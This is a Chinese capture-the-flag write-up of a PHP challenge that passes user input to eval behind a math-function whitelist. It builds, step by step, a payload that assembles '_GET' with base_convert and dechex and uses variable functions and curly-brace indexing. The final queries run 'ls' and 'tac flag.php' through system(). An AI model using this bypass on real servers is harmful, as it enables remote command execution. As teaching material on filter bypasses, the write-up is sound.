信息收集
error_reporting(0);
//聽說你很喜歡數學,不知道你是否愛它勝過愛flag
if(!isset($_GET['c'])){show_source(__FILE__);
}else{//例子 c=20-1$content = $_GET['c'];// 長度不允許超過80個字符if (strlen($content) >= 80) {die("太長了不會算");}// 設置字符黑名單,以下字符不允許出現在content中$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];foreach ($blacklist as $blackitem) {if (preg_match('/' . $blackitem . '/m', $content)) {die("請不要輸入奇奇怪怪的字符");}}// 設置白名單,只允許以下單詞出現在content中//常用數學函數http://www.w3school.com.cn/php/php_ref_math.asp$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];// 這里匹配的是變量名,這和平時編程時變量命名規則類似,第一個[],以大小寫字母或者\x7f-\xff開頭,第二個[],存在0-n個規則內的字符,也就是說a?bc會被匹配上a和bcpreg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); // 匹配正則的字符會在這里進行白名單過濾,也就是說不是變量單詞類的東西就不會在這里被過濾了foreach ($used_funcs[0] as $func) {if (!in_array($func, $whitelist)) {die("請不要輸入奇奇怪怪的函數");}}//幫你算出答案eval('echo '.$content.';');
}
白名單中有base_convert
decbin
hexdec
,也許可以加以利用
解題
使用了之前寫的腳本,構造與或非,都失敗了,主要是限制了0x7f-0xff字符的使用
base_convert(number, frombase, tobase)
?number?:要轉換的數字。
?frombase?:數字原來的進制。
?tobase?:要轉換到的進制。
return: 轉化后的數值decbin(dec_number)
dec_number:需要轉化成2進制的10進制數
return: 轉化后的數值dechex(dec_number)
dec_number:需要轉化成16進制的10進制數
return: 轉化后的數值hex2bin(hex_number)
dec_number:需要轉化成ASCII碼的16進制數
return: 轉化后的字符串
使用base_convert
構造,但是內容不能太長
我們嘗試構造一個$_GET[a]
,這樣就能繞過它的檢測了,可是_GET
和a
都不在白名單里,過不了白名單驗證
我試了一下decbin
,轉化后是二進制,不是我們想要的字符串,所以不滿足條件
得使用hex2bin
,這樣能轉化出字符串
_GET構造
<?php
echo base_convert("hex2bin",36,10).'\n'; //37907361743
echo base_convert(37907361743,10,36).'\n'; //hex2binecho bin2hex("_GET").'\n'; //5f474554
echo hexdec(bin2hex("_GET")).'\n'; //1598506324
echo decbin(1598506324).'\n'; //1011111010001110100010101010100
echo hex2bin("5f474554").'\n'; //_GET
echo hex2bin(dechex(1598506324)).'\n'; //_GET
?>
使用base_convert
的36進制轉10進制,是因為36進制包含0-9a-z
所以最后
base_convert(37907361743,10,36)(dechex(1598506324))
? hex2bin(dechex(1598506324))
? _GET
這樣構造的函數為什么能夠執行,因為,PHP 支持可變函數的概念。這意味著如果一個變量名后有圓括號,PHP 將尋找與變量的值同名的函數,并且嘗試執行它。可變函數可以用來實現包括回調函數,函數表在內的一些用途。
詳細可以看:php: 可變函數這篇文章
至此,我們僅拿到了_GET的合法構造
利用_GET
$$a
相當于 $($a)
$a
被解析成了字符串并與前面的 重新組成了變量,所以 ‘ 重新組成了變量,所以` 重新組成了變量,所以‘$a ? $apple`
<?php
$a = "apple"; // 普通變量
$$a = "banana"; // 等價于 $apple = "banana"
echo $a; //apple
echo $apple; //banana
echo $$a; //banana
?>
由于我們不能使用白名單之外的單詞,所以我們隨意選一個做變量名,但要盡可能短,畢竟限制了只能輸入80個字符
例如:
$pi=base_convert(37907361743,10,36)(dechex(1598506324))
? $pi = "_GET"
? $$pi = $_GET
繞過中括號
僅 php_version < php7.4可實現
題目的版本在當前時間段版本是7.3.11
$data = ['name' => 'apple'];
echo $data['name'];
echo $data{name};
所以可以通過$_GET{key}
繞過中括號
構造payload
$_GET{cmd}
這里cmd不在白名單內所以不能使用,我們找一個白名單里短一點的單詞,最好不是關鍵字,關鍵字可能會引發不必要的麻煩
? $_GET{sin}
把之前的$_GET翻譯過來
? $pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}&sin=system('ls');
這還不夠,因為sin = system('ls'),但是單引號被過濾了,所以我們折中一下
? $pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=ls
最終答案:
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=ls
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=tac flag.php
web122 ?? 目錄 ?? web78